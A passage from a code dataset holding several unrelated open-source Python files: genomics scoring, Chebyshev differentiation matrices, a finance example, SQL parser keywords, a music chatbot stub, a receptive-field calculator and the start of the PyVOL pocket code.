begin=int(k.split(':')[0])\n end=int(k.split(':')[1])\n cha=end-begin\n num+=cha\n for a in range(cha):\n begin+=1\n list1.append(begin)\n if len(list1)<20:\n gene_score=[]\n for b in f22:\n position=b.strip().split('\\t')[2]\n if int(position) <=list1[-1] and int(position) in list1:\n score=float(b.strip().split('\\t')[3])\n gene_score.append(score)\n gene_average=sum(gene_score)/num\n for j in range(20):\n f3.write('gene'+str(j+1)+'\\t'+str(gene_average)+'\\n')\n else: \n yu=len(list1)%20\n bases=(len(list1)-yu)/20\n l_qian=[bases+1]\n l_hou=[bases]\n l=l_qian*yu+l_hou*(20-yu)\n start_sites=0\n gene_score=[]\n for j in range(20):\n gene=list1[start_sites:start_sites+int(l[j])]\n maxi=gene[-1]\n list_of_score=[]\n start_sites=start_sites+int(l[j])\n for b in f22:\n position=b.strip().split('\\t')[2]\n if int(position) <=maxi and int(position) in gene:\n score=float(b.strip().split('\\t')[3])\n list_of_score.append(score)\n average=sum(list_of_score)/len(gene)\n gene_score+=list_of_score\n if dire=='+':\n ac='gene'\n else:\n ac='-gene'\n f3.write(ac+str(j+1)+'\\t'+str(average)+'\\n')\n\n gene_average=sum(gene_score)/len(list1)\n\n if len(gene_score)<=num:\n list11=gene_score+[0]*(num-len(gene_score))\n list2=sorted(list11)\n else:\n list2=sorted(gene_score)\n if len(list2)%2==1:\n median=list2[int((len(list2)+1)/2)]\n else:\n median=(list2[int(len(list2)/2)-1]+list2[int(len(list2)/2)])/2\n f4.write(gene_ID+'\\t'+str(gene_average)+'\\t'+str(median)+'\\n')\n\n\n os.system('rm %s.part.bed sort-k2-%s sort-k3-%s'%(name1,name1,name1))\n f1.close()\n f2.close()\n f3.close()\n\nif __name__==\"__main__\":\n head()\n","repo_name":"KirstLab/CNS_Nitrogen_Fixing_Clade","sub_path":"1_Whole_Genome_Alignments/CNSpipeline_modified/gene-cds20dengfen-ave-median.py","file_name":"gene-cds20dengfen-ave-median.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"25671960119","text":"import numpy as np\n\ndef cheb4c(N):\n \n \"\"\" \n Original Matlab function downloaded from 
https://appliedmaths.sun.ac.za/~weideman/research/differ.html\n    Article : Weideman, J. A. & Reddy, S. C. A MATLAB differentiation matrix suite. ACM Trans. Math. Softw. 26, 465–519 (2000).\n    \n    -------------------------------\n    The function [x, D4] = cheb4c(N) computes the fourth \n    derivative matrix on Chebyshev interior points, incorporating \n    the clamped boundary conditions u(1)=u'(1)=u(-1)=u'(-1)=0.\n    \n    Input:\n    N: N-2 = Order of differentiation matrix. \n    (The interpolant has degree N+1.)\n    \n    Output:\n    x: Interior Chebyshev points (vector of length N-2)\n    D4: Fourth derivative matrix (size (N-2)x(N-2))\n    --------------------------------------\n    \n    The code implements two strategies for enhanced \n    accuracy suggested by W. Don and S. Solomonoff in \n    SIAM J. Sci. Comp. Vol. 6, pp. 1253--1268 (1994).\n    The two strategies are (a) the use of trigonometric \n    identities to avoid the computation of differences \n    x(k)-x(j) and (b) the use of the \"flipping trick\"\n    which is necessary since sin t can be computed to high\n    relative precision when t is small whereas sin (pi-t) cannot.\n    \n    J.A.C. Weideman, S.C. Reddy 1998.\n    \n    \"\"\" \n    I = np.identity(N-2)                 # Identity Matrix\n    L = I==1                             # Logical Identity\n    \n    n1 = np.floor(N/2-1).astype(int)     # Indices used for flipping trick.\n    n2 = np.ceil(N/2-1).astype(int)\n    \n    k = np.arange(1,N-1).reshape(N-2,1)  # Compute theta vector\n    th = k*np.pi/(N-1)\n    \n    x = np.sin(np.pi*np.arange(N-3,1-N,-2).reshape(N-2,1) / (2*(N-1)))  # Compute interior Chebyshev points\n    \n    s = np.vstack(((np.sin(th[0:n1])),   # s = sin(th)\n                   (np.flipud(np.sin(th[0:n2])))))\n    \n    alpha = s**4                         # Compute the weight functions and their derivatives\n    beta1 = -4*s**2*x/alpha\n    beta2 = 4*(3*x**2-1)/alpha \n    beta3 = 24*x/alpha\n    beta4 = 24/alpha \n    \n    B = np.vstack(((beta1.T),\n                   (beta2.T),\n                   (beta3.T),\n                   (beta4.T)))\n    \n    \n    T = np.tile(th/2,[1,N-2])\n    DX = 2*np.sin((np.transpose(T)+T))*np.sin(np.transpose(T)-T)  # Trigonometric Identity\n    DX = np.vstack(((DX[0:n1,:]),\n                    (-np.flipud(np.fliplr(DX[0:n2,:])))))  # Flipping trick\n    DX[L] = np.ones(N-2)                 # Put 1's on the main diagonal of DX.\n    \n    ss = s**2*((-1*np.ones(N-2).reshape(N-2,1))**k)  # Compute the matrix entries c(k)/c(j)\n    S = np.tile(ss,[1,N-2])\n    C = S/S.T\n\n    Z = 1/DX                             # Z contains entries 1/(x(k)-x(j)) with zeros on the diagonal.\n    Z[L] = np.zeros(N-2)\n    \n    X = Z.T\n    indx=np.setxor1d(np.arange(0,(N-2)**2),np.arange(0,(N-2)**2,N-1))\n    X = np.reshape(np.ravel(X,order='F')[indx],(N-3,N-2),order='F')\n    \n    Y = np.ones([N-3,N-2])               # Initialize Y and D vectors. Y contains matrix of cumulative sums\n    D = np.identity(N-2)                 # D scaled differentiation matrices\n    DM = np.zeros([N-2,N-2,4])\n    \n    for ell in range(1,5):\n        \n        Y = np.cumsum(np.vstack(((B[ell-1,:]),\n                                 (ell*Y[0:N-3,:]*X))),axis=0)\n        \n        D = ell*Z*(C*np.tile(np.diag(D).reshape(N-2,1),[1,N-2]) - D)  # Off-diagonals\n        D[L] = Y[N-3,:]                  # Correct main diagonal of D\n        DM[:,:,ell-1] = D                # Store current D in DM\n    \n    return DM[:,:,3]","repo_name":"PavanVKashyap/Linear_stability_Analysis","sub_path":"cheb4c.py","file_name":"cheb4c.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18867083334","text":"\"\"\"\n    Name     : 4375OS_10_15_for_loop_implied_vol_p4f.py\n    Book     : Python for Finance\n    Publisher: Packt Publishing Ltd. 
\n Author : Yuxing Yan\n Date : 12/26/2013\n email : yany@canisius.edu\n paulyxy@hotmail.com\n\"\"\"\nimport p4f\nS=40\nK=40\nT=0.5\nr=0.05\nc=3.30\nfor i in range(200):\n sigma=0.005*(i+1)\n diff=c-p4f.bs_call(S,K,T,r,sigma)\n if abs(diff)<=0.01:\n print(i,sigma, diff)\n","repo_name":"xhd2015/Python","sub_path":"Python-for-Finance/4375OS_Code/4375OS_10_Code/4375OS_10_15_for_loop_implied_vol_p4f.py","file_name":"4375OS_10_15_for_loop_implied_vol_p4f.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"66"} +{"seq_id":"72969718610","text":"from mo_dots import Null\n\nfrom moz_sql_parser.utils import *\n\n# SQL CONSTANTS\nNULL = Keyword(\"null\", caseless=True).addParseAction(lambda: [Null])\nTRUE = Keyword(\"true\", caseless=True).addParseAction(lambda: [True])\nFALSE = Keyword(\"false\", caseless=True).addParseAction(lambda: [False])\nNOCASE = Keyword(\"nocase\", caseless=True)\nASC = Keyword(\"asc\", caseless=True)\nDESC = Keyword(\"desc\", caseless=True)\n\n# SIMPLE KEYWORDS\nAS = Keyword(\"as\", caseless=True).suppress()\nALL = Keyword(\"all\", caseless=True)\nBY = Keyword(\"by\", caseless=True).suppress()\nCAST = Keyword(\"cast\", caseless=True)\nCROSS = Keyword(\"cross\", caseless=True)\nDISTINCT = Keyword(\"distinct\", caseless=True)\nFROM = Keyword(\"from\", caseless=True).suppress()\nFULL = Keyword(\"full\", caseless=True)\nGROUP = Keyword(\"group\", caseless=True).suppress()\nHAVING = Keyword(\"having\", caseless=True).suppress()\nINNER = Keyword(\"inner\", caseless=True)\nINTERVAL = Keyword(\"interval\", caseless=True)\nJOIN = Keyword(\"join\", caseless=True)\nLEFT = Keyword(\"left\", caseless=True)\nLIKE = Keyword(\"like\", caseless=True)\nLIMIT = Keyword(\"limit\", caseless=True).suppress()\nOFFSET = Keyword(\"offset\", caseless=True).suppress()\nON = Keyword(\"on\", caseless=True).suppress()\nORDER = Keyword(\"order\", caseless=True).suppress()\nOUTER = Keyword(\"outer\", caseless=True)\nOVER = Keyword(\"over\", caseless=True).suppress()\nPARTITION = Keyword(\"partition\", caseless=True).suppress()\nRIGHT = Keyword(\"right\", caseless=True)\nRLIKE = Keyword(\"rlike\", caseless=True)\nSELECT = Keyword(\"select\", caseless=True).suppress()\nTHEN = Keyword(\"then\", caseless=True).suppress()\nUNION = Keyword(\"union\", caseless=True)\nUSING = Keyword(\"using\", caseless=True).suppress()\nWHEN = Keyword(\"when\", caseless=True).suppress()\nWHERE = Keyword(\"where\", caseless=True).suppress()\nWITH = Keyword(\"with\", caseless=True).suppress()\nWITHIN = Keyword(\"within\", caseless=True).suppress()\n\n# SIMPLE OPERATORS\nCASTING = Literal(\"::\").set_parser_name(\"concat\")\nCONCAT = Literal(\"||\").set_parser_name(\"concat\")\nMUL = Literal(\"*\").set_parser_name(\"mul\")\nDIV = Literal(\"/\").set_parser_name(\"div\")\nMOD = Literal(\"%\").set_parser_name(\"mod\")\nNEG = Literal(\"-\").set_parser_name(\"neg\")\nADD = Literal(\"+\").set_parser_name(\"add\")\nSUB = Literal(\"-\").set_parser_name(\"sub\")\nBINARY_NOT = Literal(\"~\").set_parser_name(\"binary_not\")\nBINARY_AND = Literal(\"&\").set_parser_name(\"binary_and\")\nBINARY_OR = Literal(\"|\").set_parser_name(\"binary_or\")\nGTE = Literal(\">=\").set_parser_name(\"gte\")\nLTE = Literal(\"<=\").set_parser_name(\"lte\")\nLT = Literal(\"<\").set_parser_name(\"lt\")\nGT = Literal(\">\").set_parser_name(\"gt\")\nEQ = (Literal(\"==\") | Literal(\"=\")).set_parser_name(\"eq\")\nNEQ = (Literal(\"!=\") | 
Literal(\"<>\")).set_parser_name(\"neq\")\n\nAND = Keyword(\"and\", caseless=True)\nBETWEEN = Keyword(\"between\", caseless=True)\nCASE = Keyword(\"case\", caseless=True).suppress()\nCOLLATE = Keyword(\"collate\", caseless=True)\nEND = Keyword(\"end\", caseless=True)\nELSE = Keyword(\"else\", caseless=True).suppress()\nIN = Keyword(\"in\", caseless=True)\nIS = Keyword(\"is\", caseless=True)\nNOT = Keyword(\"not\", caseless=True)\nOR = Keyword(\"or\", caseless=True)\n\n# COMPOUND KEYWORDS\nCROSS_JOIN = Group(CROSS + JOIN).set_parser_name(\"cross join\")\nFULL_JOIN = Group(FULL + JOIN).set_parser_name(\"full join\")\nFULL_OUTER_JOIN = Group(FULL + OUTER + JOIN).set_parser_name(\"full outer join\")\nGROUP_BY = Group(GROUP + BY).set_parser_name(\"group by\")\nINNER_JOIN = Group(INNER + JOIN).set_parser_name(\"inner join\")\nLEFT_JOIN = Group(LEFT + JOIN).set_parser_name(\"left join\")\nLEFT_OUTER_JOIN = Group(LEFT + OUTER + JOIN).set_parser_name(\"left outer join\")\nORDER_BY = Group(ORDER + BY).set_parser_name(\"order by\")\nPARTITION_BY = Group(PARTITION + BY).set_parser_name(\"partition by\")\nRIGHT_JOIN = Group(RIGHT + JOIN).set_parser_name(\"right join\")\nRIGHT_OUTER_JOIN = Group(RIGHT + OUTER + JOIN).set_parser_name(\"right outer join\")\nSELECT_DISTINCT = Group(SELECT + DISTINCT).set_parser_name(\"select distinct\")\nUNION_ALL = Group(UNION + ALL).set_parser_name(\"union_all\")\nWITHIN_GROUP = Group(WITHIN + GROUP).set_parser_name(\"within_group\")\n\n# COMPOUND OPERATORS\nNOT_BETWEEN = Group(NOT + BETWEEN).set_parser_name(\"not_between\")\nNOT_LIKE = Group(NOT + LIKE).set_parser_name(\"not_like\")\nNOT_RLIKE = Group(NOT + RLIKE).set_parser_name(\"not_rlike\")\nNOT_IN = Group(NOT + IN).set_parser_name(\"nin\")\nIS_NOT = Group(IS + NOT).set_parser_name(\"is_not\")\n\nRESERVED = MatchFirst([\n ALL,\n AND,\n AS,\n ASC,\n BETWEEN,\n BY,\n CASE,\n CAST,\n COLLATE,\n CROSS_JOIN,\n CROSS,\n DESC,\n DISTINCT,\n ELSE,\n END,\n FALSE,\n FROM,\n FULL_JOIN,\n FULL_OUTER_JOIN,\n FULL,\n GROUP_BY,\n GROUP,\n HAVING,\n IN,\n INNER_JOIN,\n INNER,\n INTERVAL,\n IS_NOT,\n IS,\n JOIN,\n LEFT_JOIN,\n LEFT_OUTER_JOIN,\n LEFT,\n LIKE,\n LIMIT,\n NOCASE,\n NOT_BETWEEN,\n NOT_IN,\n NOT_LIKE,\n NOT_RLIKE,\n NOT,\n NULL,\n OFFSET,\n ON,\n OR,\n ORDER_BY,\n ORDER,\n OUTER,\n OVER,\n PARTITION_BY,\n PARTITION,\n RIGHT_JOIN,\n RIGHT_OUTER_JOIN,\n RIGHT,\n RLIKE,\n SELECT_DISTINCT,\n SELECT,\n THEN,\n TRUE,\n UNION_ALL,\n UNION,\n USING,\n WHEN,\n WHERE,\n WITH,\n WITHIN_GROUP,\n WITHIN,\n])\n\nLB = Literal(\"(\").suppress()\nRB = Literal(\")\").suppress()\n\njoin_keywords = {\n \"join\",\n \"full join\",\n \"cross join\",\n \"inner join\",\n \"left join\",\n \"right join\",\n \"full outer join\",\n \"right outer join\",\n \"left outer join\",\n}\n\nunary_ops = (NEG, NOT, BINARY_NOT)\n\nprecedence = {\n # https://www.sqlite.org/lang_expr.html\n \"cast\": 0,\n \"collate\": 0,\n \"concat\": 1,\n \"mul\": 2,\n \"div\": 2,\n \"mod\": 2,\n \"neg\": 3,\n \"add\": 3,\n \"sub\": 3,\n \"binary_not\": 4,\n \"binary_and\": 4,\n \"binary_or\": 4,\n \"gte\": 5,\n \"lte\": 5,\n \"lt\": 5,\n \"gt\": 6,\n \"eq\": 7,\n \"neq\": 7,\n \"between\": 8,\n \"not_between\": 8,\n \"in\": 8,\n \"nin\": 8,\n \"is\": 8,\n \"like\": 8,\n \"not_like\": 8,\n \"rlike\": 8,\n \"not_rlike\": 8,\n \"and\": 10,\n \"or\": 11,\n}\n\n\nKNOWN_OPS = [\n CASTING,\n COLLATE,\n CONCAT,\n MUL | DIV | MOD,\n NEG,\n ADD | SUB,\n BINARY_NOT,\n BINARY_AND,\n BINARY_OR,\n GTE | LTE | LT | GT,\n EQ | NEQ,\n (BETWEEN, AND),\n (NOT_BETWEEN, AND),\n IN,\n NOT_IN,\n 
IS_NOT,\n IS,\n LIKE,\n NOT_LIKE,\n RLIKE,\n NOT_RLIKE,\n NOT,\n AND,\n OR,\n]\n\ntimes = [\"now\", \"today\", \"tomorrow\", \"eod\"]\n\ndurations = {\n \"microseconds\": \"microsecond\",\n \"microsecond\": \"microsecond\",\n \"microsecs\": \"microsecond\",\n \"microsec\": \"microsecond\",\n \"useconds\": \"microsecond\",\n \"usecond\": \"microsecond\",\n \"usecs\": \"microsecond\",\n \"usec\": \"microsecond\",\n \"us\": \"microsecond\",\n \"milliseconds\": \"millisecond\",\n \"millisecond\": \"millisecond\",\n \"millisecon\": \"millisecond\",\n \"mseconds\": \"millisecond\",\n \"msecond\": \"millisecond\",\n \"millisecs\": \"millisecond\",\n \"millisec\": \"millisecond\",\n \"msecs\": \"millisecond\",\n \"msec\": \"millisecond\",\n \"ms\": \"millisecond\",\n \"seconds\": \"second\",\n \"second\": \"second\",\n \"secs\": \"second\",\n \"sec\": \"second\",\n \"s\": \"second\",\n \"minutes\": \"minute\",\n \"minute\": \"minute\",\n \"mins\": \"minute\",\n \"min\": \"minute\",\n \"m\": \"minute\",\n \"hours\": \"hour\",\n \"hour\": \"hour\",\n \"hrs\": \"hour\",\n \"hr\": \"hour\",\n \"h\": \"hour\",\n \"days\": \"day\",\n \"day\": \"day\",\n \"d\": \"day\",\n \"dayofweek\": \"dow\",\n \"dow\":\"dow\",\n \"weekday\":\"dow\",\n \"weeks\": \"week\",\n \"week\": \"week\",\n \"w\": \"week\",\n \"months\": \"month\",\n \"mons\": \"month\",\n \"mon\": \"month\",\n \"quarters\": \"quarter\",\n \"quarter\": \"quarter\",\n \"years\": \"year\",\n \"year\": \"year\",\n \"decades\": \"decade\",\n \"decade\": \"decade\",\n \"decs\": \"decade\",\n \"dec\": \"decade\",\n \"centuries\": \"century\",\n \"century\": \"century\",\n \"cents\": \"century\",\n \"cent\": \"century\",\n \"c\": \"century\",\n \"millennia\": \"millennium\",\n \"millennium\": \"millennium\",\n \"mils\": \"millennium\",\n \"mil\": \"millennium\",\n \"epoch\": \"epoch\",\n}\n\n_size = Optional(LB + intNum(\"params\") + RB)\n_sizes = Optional(LB + intNum(\"params\") + \",\" + intNum(\"params\") + RB)\n\n# KNOWN TYPES\nARRAY = Group(Keyword(\"array\", caseless=True)(\"op\")).addParseAction(to_json_call)\nBIGINT = Group(Keyword(\"bigint\", caseless=True)(\"op\")).addParseAction(to_json_call)\nBOOL = Group(Keyword(\"bool\", caseless=True)(\"op\")).addParseAction(to_json_call)\nBOOLEAN = Group(Keyword(\"boolean\", caseless=True)(\"op\")).addParseAction(to_json_call)\nDOUBLE = Group(Keyword(\"double\", caseless=True)(\"op\")).addParseAction(to_json_call)\nFLOAT64 = Group(Keyword(\"float64\", caseless=True)(\"op\")).addParseAction(to_json_call)\nGEOMETRY = Group(Keyword(\"geometry\", caseless=True)(\"op\")).addParseAction(to_json_call)\nINTEGER = Group(Keyword(\"integer\", caseless=True)(\"op\")).addParseAction(to_json_call)\nINT = Group(Keyword(\"int\", caseless=True)(\"op\")).addParseAction(to_json_call)\nINT32 = Group(Keyword(\"int32\", caseless=True)(\"op\")).addParseAction(to_json_call)\nINT64 = Group(Keyword(\"int64\", caseless=True)(\"op\")).addParseAction(to_json_call)\nREAL = Group(Keyword(\"real\", caseless=True)(\"op\")).addParseAction(to_json_call)\nTEXT = Group(Keyword(\"text\", caseless=True)(\"op\")).addParseAction(to_json_call)\nSMALLINT = Group(Keyword(\"smallint\", caseless=True)(\"op\")).addParseAction(to_json_call)\nSTRING = Group(Keyword(\"string\", caseless=True)(\"op\")).addParseAction(to_json_call)\nSTRUCT = Group(Keyword(\"struct\", caseless=True)(\"op\")).addParseAction(to_json_call)\n\nBLOB = (Keyword(\"blob\", caseless=True)(\"op\") + _size).addParseAction(to_json_call)\nBYTES = (Keyword(\"bytes\", 
caseless=True)(\"op\") + _size).addParseAction(to_json_call)\nCHAR = (Keyword(\"char\", caseless=True)(\"op\") + _size).addParseAction(to_json_call)\nVARCHAR = (Keyword(\"varchar\", caseless=True)(\"op\") + _size).addParseAction(to_json_call)\n\nDECIMAL = (\n Keyword(\"decimal\", caseless=True)(\"op\") + _sizes\n).addParseAction(to_json_call)\nNUMERIC = (\n Keyword(\"numeric\", caseless=True)(\"op\") + _sizes\n).addParseAction(to_json_call)\n\n\nDATE = Keyword(\"date\", caseless=True)\nDATETIME = Keyword(\"datetime\", caseless=True)\nTIME = Keyword(\"time\", caseless=True)\nTIMESTAMP = Keyword(\"timestamp\", caseless=True)\nTIMESTAMPTZ = Keyword(\"timestamptz\", caseless=True)\nTIMETZ = Keyword(\"timetz\", caseless=True)\n\ntime_functions = MatchFirst([DATE, DATETIME, TIME, TIMESTAMP, TIMESTAMPTZ, TIMETZ])\n\n# KNOWNN TIME TYPES\n_format = Optional(Regex(r'\\\"(\\\"\\\"|[^\"])*\\\"')(\"params\").addParseAction(unquote))\n\nDATE_TYPE = (DATE(\"op\") + _format).addParseAction(to_json_call)\nDATETIME_TYPE = (DATETIME(\"op\") + _format).addParseAction(to_json_call)\nTIME_TYPE = (TIME(\"op\") + _format).addParseAction(to_json_call)\nTIMESTAMP_TYPE = (TIMESTAMP(\"op\") + _format).addParseAction(to_json_call)\nTIMESTAMPTZ_TYPE = (TIMESTAMPTZ(\"op\") + _format).addParseAction(to_json_call)\nTIMETZ_TYPE = (TIMETZ(\"op\") + _format).addParseAction(to_json_call)\n\nknown_types = MatchFirst([\n ARRAY,\n BIGINT,\n BOOL,\n BOOLEAN,\n BLOB,\n BYTES,\n CHAR,\n DATE_TYPE,\n DATETIME_TYPE,\n DECIMAL,\n DOUBLE,\n FLOAT64,\n GEOMETRY,\n INTEGER,\n INT,\n INT32,\n INT64,\n NUMERIC,\n REAL,\n TEXT,\n SMALLINT,\n STRING,\n STRUCT,\n TIME_TYPE,\n TIMESTAMP_TYPE,\n TIMESTAMPTZ_TYPE,\n TIMETZ_TYPE,\n VARCHAR,\n])\n","repo_name":"astrojams1/cleanstreets","sub_path":".venv/lib/python3.8/site-packages/moz_sql_parser/keywords.py","file_name":"keywords.py","file_ext":"py","file_size_in_byte":11276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"40990294314","text":"import scene\nimport os\n\nclass SceneCollection:\n def __init__(self, path):\n self.dict = {}\n self.load_scenes(path)\n \n def load_scenes(self, path):\n directory = os.fsencode(path)\n\n for subdir, dirs, files in os.walk(directory):\n for dir in dirs:\n dir_path = path + \"/\" + os.fsdecode(dir)\n self.dict.update({dir_path: scene.Scene(dir_path, *(0,0))})\n \n","repo_name":"MlepNos/TimeTrialRacing-Python","sub_path":"RacingGame/scene_collection.py","file_name":"scene_collection.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10027302099","text":"data = input()\r\ndict = {}\r\nwhile data != \"Over\":\r\n splited_data = data.split(\" : \")\r\n name = splited_data[0]\r\n number = splited_data[1]\r\n\r\n if number.isdigit():\r\n dict[name] = number\r\n else:\r\n dict[number] = name\r\n\r\n data = input()\r\n\r\nfor key, value in sorted(dict.items()):\r\n print(f\"{key} -> {value}\")\r\n","repo_name":"yotkoKanchev/Python-Fundamentals-June-2018","sub_path":"02. 
Lists-and-Dictionaries/5Mixed Phones.py","file_name":"5Mixed Phones.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2737477422","text":"class Hero():\n    def __init__(self, name):\n        self.name = name\n        # kkbox IDs of the stored songs\n        self.songIDList = []\n        # white/black lists\n        self.whitelist = []\n        self.blacklist = []\n        # the chosen artist\n        self.chooseArtist = \"\"\n        self.index = 0\n\n    def run(self, msg):\n        # the user is asking for a song\n        if(msg.find(\"給我歌曲\")!=-1):\n            return [0,\"give_song\"]\n        elif(msg.find(\"生成歌詞\")!=-1):\n            return [10,\"~~~生成歌詞~~~\"]\n        else:\n            # not a keyword message\n            response = self.getBotResponse(msg) # get the chatterbot response\n            #print(\"response = \" + str(response))\n            if(self.index==0):\n                # return [0][\"Lry\"]\n                self.index +=1\n                return [1,\"回應歌詞\"]\n            elif(self.index==1):\n                self.index +=1\n                return [2,\"恩恩,再給我一些提示\"]\n            else:\n                self.index = 0\n                return [3,\"你喜歡某某歌手齁\"]\n\n\n    def getBotResponse(self,msg):\n        # the code that connects to the server API goes here\n\n        # return value\n        #[\n        #    {\n        #        \"confidence\": float,\n        #        \"kkboxID\": string,\n        #        \"Artists\": string,\n        #        \"Lry\": string,\n        #        \"SongName\": string\n        #    },\n        #    ...\n        # ]\n        return_list = []\n        # save the results\n        for dd in return_list:\n            self.SaveSongMsg(dd)\n        return_list = sorted(return_list, key=lambda s: s['confidence'], reverse=True)\n        #(\"return_list = \"+ str(return_list))\n        return return_list\n\n\n    def SaveSongMsg(self,data):\n        #print(\"in getSongID_andSave()\")\n        if(len(self.songIDList) == 0):\n            insideData = {\n                'ID':data['kkboxID'],\n                'times':1,\n                'Artists':data['Artists'],\n                \"Confidence\":data['confidence']\n            }\n            self.songIDList.append(insideData)\n        else:\n            dd = [d for d in self.songIDList if d.get('ID')==data['kkboxID']]\n            if(len(dd) == 0): # if it does not exist yet\n                insideData = {\n                    'ID':data['kkboxID'],\n                    'times':1,\n                    'Artists':data['Artists'],\n                    \"Confidence\":data['confidence']\n                }\n                self.songIDList.append(insideData)\n            else:\n                for i in range(len(self.songIDList)):\n                    if(self.songIDList[i]['ID'] == data['kkboxID']):\n                        self.songIDList[i]['times'] = self.songIDList[i]['times'] + 1\n                        break\n\n\n    def addWhiteList(self):\n        # code that adds to the whitelist goes here\n        print(\"加入白名單\")\n    \n    def addBlackList(self):\n        # code that adds to the blacklist goes here\n        print(\"加入黑名單\")\n\n    def Reset(self):\n        # kkbox IDs of the stored songs\n        self.songIDList = []\n        # white/black lists\n        self.whitelist = []\n        self.blacklist = []\n        # the chosen artist\n        self.chooseArtist = \"\"\n        self.index = 0","repo_name":"andychod/LittleProject","sub_path":"kkboxTemp/Batman.py","file_name":"Batman.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30997767383","text":"def calc(NL_PG,NL_R,N_r,W_max,is_offline):\n    r_dilation = []\n\n    pg_dilation1 = []\n    pg_dilation2 = []\n    future_vec = []\n\n    if is_offline:\n        for i in range(NL_PG):\n            pg_dilation1.append(2**i)\n            pg_dilation2.append(2**(NL_PG-i-1))\n            future_vec.append(max(2**i,2**(NL_PG-i-1)))\n\n        PG_future = sum(future_vec)\n        PG_receptive = 2*PG_future + 1\n        for i in range(NL_R):\n            r_dilation.append(2**i)\n        R_future = sum(r_dilation)\n        R_receptive = 2*R_future +1\n\n        total_receptive = PG_receptive + N_r*(R_receptive - 1)\n        total_future = PG_future + N_r * R_future\n        # total_receptive1 = total_future*2 +1\n        print(total_future)\n        return total_future, total_receptive\n    else:\n        for i in range(NL_PG):\n            delta_1 = min(2**i,W_max)\n            delta_2 = min(2**(NL_PG-i-1),W_max)\n            pg_dilation1.append(delta_1)\n            pg_dilation2.append(delta_2)\n            future_vec.append(max(delta_1, delta_2))\n        PG_future = sum(future_vec)\n\n        for i in range(NL_R):\n            
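# online case: each dilation is clipped to the window bound W_max,\n            # so the lookahead grows 1, 2, 4, ... and then saturates at W_max\n            # instead of doubling without bound\n            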
r_dilation.append(min(2**i,W_max))\n R_future = sum(r_dilation)\n total_future = PG_future + (N_r * R_future)\n print(total_future)\n return total_future, \"not impementet yet\"\n\n\n\ncalc(10,10,3,10,True)","repo_name":"AdamGoldbraikh/Bounded-Future-MS-TCNPP-for-Surgical-Gesture-Recognition","sub_path":"receptive_field_params_calc.py","file_name":"receptive_field_params_calc.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72153081169","text":"import requests\nimport json\n\nresponse_get = requests.get('http://127.0.0.1:5000/values')\n\ndados = response_get.json()\nprint(dados)\nprint(f\"Total Sum is: {dados['total_sum']}\")\n\nresponse_post = requests.post('http://127.0.0.1:5000/values', json={'values': [10, 20, 30, 40]})\n\ndados = response_post.json()\nprint(dados)\nprint(f\"Total Sum is: {dados['total_sum']}\")","repo_name":"uadson/flask_restapi","sub_path":"requests_file.py","file_name":"requests_file.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"133452650","text":"\nfrom .spheres import Spheres\nfrom . import cluster, configuration, utilities\nimport glob\nimport inspect\nimport itertools\nimport logging\nimport numpy as np\nimport os\nimport pandas as pd\nimport shutil\nimport sys\n\nlogger = logging.getLogger(__name__)\n\ndef load_calculation(data_dir, input_opts=None):\n \"\"\" load the results of a calculation from file\n\n Args:\n data_dir (str): directory where previous calculation results are stored\n input_opts (dict): dictionary of pyvol options that is used to update the options read in from file\n\n Returns:\n pockets ([Spheres]): a list of Spheres objects each of which contains the geometric information describing a distinct pocket or subpocket\n opts (dict): updated PyVOL options dictionary\n\n \"\"\"\n\n if not os.path.isdir(data_dir):\n logger.error(\"{0} is not a directory\".format(data_dir))\n raise FileNotFoundError\n\n cfg_files = glob.glob(os.path.join(data_dir, \"*.cfg\"))\n if len(cfg_files) == 0:\n logger.error(\"No cfg file found in {0}\".format(data_dir))\n raise FileNotFoundError\n elif len(cfg_files) > 1:\n logger.error(\"Multiple cfg files found in {0}\".format(data_dir))\n raise FileNotFoundError\n\n opts = configuration.file_to_opts(cfg_files[0])\n if isinstance(input_opts, dict):\n opts.update(input_opts)\n opts = configuration.clean_opts(opts)\n\n rept_file = os.path.join(data_dir, \"{0}.rept\".format(opts.get(\"prefix\")))\n if not os.path.isfile(rept_file):\n logger.error(\"No rept file found at {0}\".format(rept_file))\n raise FileNotFoundError\n\n rept_df = pd.read_csv(rept_file)\n pockets = []\n for index, row in rept_df.iterrows():\n xyzrg_file = os.path.join(data_dir, \"{0}.xyzrg\".format(row[\"name\"]))\n pockets.append(Spheres(spheres_file=xyzrg_file))\n\n return pockets, opts\n\n\ndef pocket(**opts):\n \"\"\"Calculates the SES for a binding pocket\n\n Args:\n opts (dict): dictionary containing all PyVOL options (see pyvol.pymol_interface.pymol_pocket_cmdline for details)\n\n Returns:\n pockets ([Spheres]): a list of Spheres objects each of which contains the geometric information describing a distinct pocket or subpocket\n\n \"\"\"\n\n if os.path.dirname(opts.get(\"prot_file\")) != opts.get(\"output_dir\"):\n new_prot_file = os.path.join(opts.get(\"output_dir\"), os.path.basename(opts.get(\"prot_file\")))\n 
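# copy the input structure into the output directory so the saved\n        # .cfg/.rept files and the geometry they reference live side by side\n        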
